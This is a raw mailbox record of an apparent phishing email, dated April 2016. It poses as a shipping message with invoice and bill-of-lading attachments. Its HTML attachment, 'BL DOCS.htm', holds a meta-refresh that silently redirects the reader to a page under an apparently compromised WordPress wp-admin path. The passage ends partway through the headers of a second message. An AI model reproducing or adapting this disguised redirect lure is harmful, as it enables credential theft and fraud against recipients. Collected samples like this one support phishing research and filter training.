From: "Grace Hunn" <richie7012003@tecklink.com>
Date: Wed, 20 Apr 2016 15:12:57 +0100
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - shmail2.superhosting.bg
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - tecklink.com
X-Get-Message-Sender-Via: shmail2.superhosting.bg: authenticated_id: bulven@techno-link.com
X-Authenticated-Sender: shmail2.superhosting.bg: bulven@techno-link.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 179

You will not see this in a MIME-aware mail reader.
--===============1111740605==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Good morning
Please find attached the commercial invoice. packing list and Bill of ladin=
g.
Thanks

Grace Hunn
--===============1111740605==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="BL DOCS.htm"

<html>
<meta http-equiv=3D"refresh" content=3D"0; url=3Dhttp://www.republicadelcac=
ao.com/wp-admin/use/SHIPPING DOCUMENT.html" />
<title>Redirecting...</title>

<head>
<body><img src =3D ""></body>
</head>
</html>
--===============1111740605==--

From jose@monkey.org Wed Apr 20 22:25:10 2016 +0000
Return-Path: rscruggs@imaginecolorado.org
Delivered-To: jose@monkey.org
X-FDA: 71427988380.19.song21_ffd560786940
X-Spam-Summary: 50,0,0,1c2afcb8a80bb058,d41d8cd98f00b204,rscruggs@imaginecolorado.org,:info@mail.org,RULES_HIT:10:41:72:355:379:474:582:960:962:967:973:978:983:988:989:1152:1158:1189:1208:1221:1256:1260:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1575:1588:1589:1592:1594:1711:1730:1776:1792:2525:2527:2553:2561:2564:2610:2682:2685:2693:2859:2892:2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4552:4860:5007:6117:6261:7688:7875:7903:8518:8526:8603:8957:9025:9040:9080:9111:9411:9908:10004:10215:10346:10400:10432:10433:10450:10455:11656:11658:11914:12043:12291:12438:12519:12555:12663:12679:12683:12698:12737:13095:13139:13163:13229:13237:13439:14110:14149:14158:14181:14346:14659:14721:19903:19904:19997:19999:21064:21080:21326:30022:30023:30037:30049:30054:30070:30075:30090:30091,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,Domai
X-HE-Tag: song21_ffd560786940
X-Filterd-Recvd-Size: 3557
Received: from webmail.imaginecolorado.org (webmail.imaginecolorado.org [63.253.69.246])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 20 Apr 2016 22:25:09 +0000 (UTC)
Received: from E2K10EXCH01.imagine.imaginecolorado.org
 ([fe80::89db:5a43:59a8:7141]) by E2K10EXCH01.imagine.imaginecolorado.org
 ([fe80::89db:5a43:59a8:7141%13]) with mapi id 14.03.0174.001; Wed, 20 Apr
 2016 16:25:08 -0600
